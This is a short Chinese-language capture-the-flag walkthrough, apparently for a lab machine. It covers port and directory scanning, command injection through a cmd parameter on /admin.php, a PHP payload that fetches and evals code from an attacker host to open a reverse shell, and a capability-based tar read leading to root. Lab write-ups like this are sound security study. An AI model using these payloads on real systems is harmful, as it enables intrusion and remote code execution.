-
ip
-
端口
-
访问80端口
-
目录扫描
-
访问 /admin.php
-
使用 burp 抓包
将 index.php 修改成 admin.php
添加 cmd 参数,结果返回响应的信息
-
反弹shell
name=123&username=123&password=123&access=access&cmd=php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.154.128:8080/6a3fvwaVo', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"
-
在 /home/domom/Desktop 目录下存在 README.md ,但是没有权限
-
搜索 capabilities
getcap -r / 2>/dev/null
使用 tar 将 README.md 打包并读取
tar -cvf readme.tar /home/domom/Desktop/README.md cat readme.tar
直接切换到 root 用户